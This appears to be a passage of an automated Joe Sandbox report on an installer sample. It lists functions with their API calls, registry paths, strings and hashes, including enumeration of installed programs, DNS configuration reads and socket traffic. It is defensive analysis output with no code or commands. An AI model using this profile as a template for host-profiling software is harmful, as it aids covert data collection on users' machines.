Sleep.KERNEL32 ref: 000211B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
GetStartupInfoA.KERNEL32 ref: 00021433

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: f7a1cbd7e5ed746ac211440bc0ba462d525e38ebe67a90d19cb0527f47dfa10e
Instruction ID: bc6c4671c6889b71f4600b32d05ee4c81b0d1c5f895d6c063c80fdebb44d8f10
Opcode Fuzzy Hash: f7a1cbd7e5ed746ac211440bc0ba462d525e38ebe67a90d19cb0527f47dfa10e
Instruction Fuzzy Hash: 535178B1A043158FDB51EF68E9807AABBF2FB59304F10492DE9489B312DB70A945CF91

Function 000EA8C0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 000EA90C

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: a7f3c86ea7e0dd52a7dfbf48662851e8c746647ea667632e1cdbb2c362c873b0
Instruction ID: ac8e65f61d8baf7899b1888df9c954bbb085b9403a15931dd757354a16efe637
Opcode Fuzzy Hash: a7f3c86ea7e0dd52a7dfbf48662851e8c746647ea667632e1cdbb2c362c873b0
Instruction Fuzzy Hash: FCF01D75208348AFD2209F42DC48D6BBBEDEFCD754F05456DF958232119671AE14CA72

Function 000DA440 Relevance: 93.8, APIs: 43, Strings: 10, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 000DAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 000DAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 000DAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 000DAB30
RegCloseKey.KERNELBASE(?), ref: 000DAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 000DAB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DABF0
RegCloseKey.ADVAPI32(?), ref: 000DAC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 000DAC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 000DAC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 000DACB4
RegCloseKey.ADVAPI32(?), ref: 000DACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 000DAD0A
RegEnumKeyExA.KERNELBASE ref: 000DAD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 000DADB0
RegCloseKey.KERNELBASE(?), ref: 000DADD9
RegEnumKeyExA.KERNELBASE ref: 000DAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 000DAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DAE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 000DAEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000DAF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 000DAF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 000DAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 000DAFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000DB027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 000DB03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 000DB072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 000DB0C1

Strings

DhcpDomain, xrefs: 000DB06C, 000DB0BB
[%s]:%u%%%u, xrefs: 000DA77D
[%s]:%u, xrefs: 000DA845
SearchList, xrefs: 000DAA46, 000DAA91, 000DABA7, 000DABEA, 000DAE4E, 000DAE9D
Software\Policies\Microsoft\System\DNSClient, xrefs: 000DAC3C
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 000DAB78
PrimaryDNSSuffix, xrefs: 000DAC6B, 000DACAE
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 000DAD00
Domain, xrefs: 000DAAE3, 000DAB2A, 000DAF5D, 000DAFAC
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 000DAA0F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
API String ID: 1856363200-4239849775
Opcode ID: 8521ab0b5417ca44bf4c19cb79dc9b4e93a5465ebe21e3416237f61eaac19129
Instruction ID: 20bc31ccb8f302d7ef155d4f1a6bb2e5a9c5ce694d54d62010be3534af7e7c5c
Opcode Fuzzy Hash: 8521ab0b5417ca44bf4c19cb79dc9b4e93a5465ebe21e3416237f61eaac19129
Instruction Fuzzy Hash: 7F82A071604341AFE3209F25DC85B6BBBE9EF86740F144829F945DB3A1EB70E944CB62

Function 000E9740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 000E978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 000E97BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000E97E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000E98A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 000E9920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 000E9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 000E9974
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 000E9981
RegCloseKey.ADVAPI32(?), ref: 000E998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000E9992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000E97FE

Part of subcall function 000E78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,000EE16D,?), ref: 000E78AF
Part of subcall function 000E78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 000E78D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 000E9C46

Strings

DatabasePath, xrefs: 000E996B
#, xrefs: 000E9A3F
#, xrefs: 000E9B9D
CARES_HOSTS, xrefs: 000E9788
sts, xrefs: 000E99A2
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 000E993C
\hos, xrefs: 000E999A

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3843116398-4129964100
Opcode ID: 4185722d73c2d9d3d8d9c4f5f5e38bff4176e719403ce063369ff4486d47725b
Instruction ID: 6fa7516ff800e3b0acd79a0bf7f784ffbde97a40d5f14e52bc383b4c57547b02
Opcode Fuzzy Hash: 4185722d73c2d9d3d8d9c4f5f5e38bff4176e719403ce063369ff4486d47725b
Instruction Fuzzy Hash: 7E32D6B1904381AFE751AB26EC42A5B77E5AF54314F084435F909AA363FB31ED14C7A3

Function 00022F17 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00022FED
RegEnumKeyExA.KERNELBASE ref: 000231A5
RegCloseKey.KERNELBASE ref: 000231C0

Strings

app_name, xrefs: 000230F0
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00022F5D
DisplayName, xrefs: 000230BD
installed_apps, xrefs: 00022F36
d, xrefs: 00022FA0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00022F49, 00022F71
%s\%s, xrefs: 00023028
index, xrefs: 00023112

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: CloseEnumOpen
String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
API String ID: 1332880857-3120786300
Opcode ID: c683dc6de3b7cf8c44c25092785a44ce5bc289acc43cdf4c3ec5b3b6fa061f45
Instruction ID: 270a1e08dcbecbb8409927d81f54d9d08887ada9f850551ff2306d66667b5b95
Opcode Fuzzy Hash: c683dc6de3b7cf8c44c25092785a44ce5bc289acc43cdf4c3ec5b3b6fa061f45
Instruction Fuzzy Hash: A07191B49043199FDB50EF69D5847AEBBF0BF84308F10885DE998A7311D7749A88CF92

Function 001FE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 001FE5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 001FE637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0018A31E), ref: 001FE64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0018A31E,00000001,?,00000008,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000), ref: 001FE665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0018A31E,?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E), ref: 001FE6A6
GetLastError.KERNEL32(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 001FE6CC
GetLastError.KERNEL32(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0018A31E,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE6FA

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: 753119d39295e8ad79f66689e0ef9829975113462c2a3549fa00cfc57fee0268
Instruction ID: ba9b6045f849365563b793e71048316a36c7cdd34b09f15f7f424a6e37a61102
Opcode Fuzzy Hash: 753119d39295e8ad79f66689e0ef9829975113462c2a3549fa00cfc57fee0268
Instruction Fuzzy Hash: 3031A075640208BFEB216B71DC49F7B3BAAEB55721F148524FB16C95E0EF309910CBA2

Function 00058B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00058C2F
WSAGetLastError.WS2_32 ref: 00058C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00058CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00058D0E
WSAGetLastError.WS2_32 ref: 00058D18
WSASetLastError.WS2_32(00000000), ref: 00058E0C

Strings

cf-socket.c, xrefs: 00058EDF
connected, xrefs: 00058DA7
not connected yet, xrefs: 00058BDC
connect to %s port %u from %s port %d failed: %s, xrefs: 00058E78
local address %s port %d..., xrefs: 00058C7F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: cd5096495c769fb1c3ecfbd4f56703ef094841b73eeb6c60d8af230d0b85fcf5
Instruction ID: ada5835603e5bd636557e11d6289191296128a12180ebe69101d61f8e73ca8c8
Opcode Fuzzy Hash: cd5096495c769fb1c3ecfbd4f56703ef094841b73eeb6c60d8af230d0b85fcf5
Instruction Fuzzy Hash: 3FB1A070604705AFE720CF24C885BABBBF9AF45315F04C529EC59AB2D2DB71E858CB61

Function 000276A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32( Y,?,?,?), ref: 000276DE
send.WS2_32( Y,?,?,?), ref: 000276EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00027721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00027745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002774D

Strings

SEND %s:%d send(%lu) = %ld, xrefs: 000276F8
Y, xrefs: 000276B8, 000276DD, 000276E9
LIMIT %s:%d %s reached memlimit, xrefs: 00027712, 00027731
send, xrefs: 0002770B, 0002772A

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: Y$LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$send
API String ID: 3540913164-2201046788
Opcode ID: b4dd1608f05950632359f86fb8906587d03a2cff73cd7dd459baf578f134425d
Instruction ID: 9f5fce6bf631557ad823b5c2113d9b8cc6449dea3139322a33b6f8c160132896
Opcode Fuzzy Hash: b4dd1608f05950632359f86fb8906587d03a2cff73cd7dd459baf578f134425d
Instruction Fuzzy Hash: 2211ABB9A493247BE7105B59BC49E377FADEB85B68F040508FC0853353DA619D00C6B1

Function 001A47B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001FE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE5E2
Part of subcall function 001FE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 001FE5FA
Part of subcall function 001FE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 001FE637
Part of subcall function 001FE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0018A31E), ref: 001FE64D
Part of subcall function 001FE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0018A31E,00000001,?,00000008,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000), ref: 001FE665
Part of subcall function 001FE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE678
Part of subcall function 001FE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE685
Part of subcall function 001FE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE690
Part of subcall function 001FE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0018A31E,?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E), ref: 001FE6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,005FBED4), ref: 001A47CC
GetLastError.KERNEL32(?,?,?,?,?,?,005FBED4), ref: 001A483D
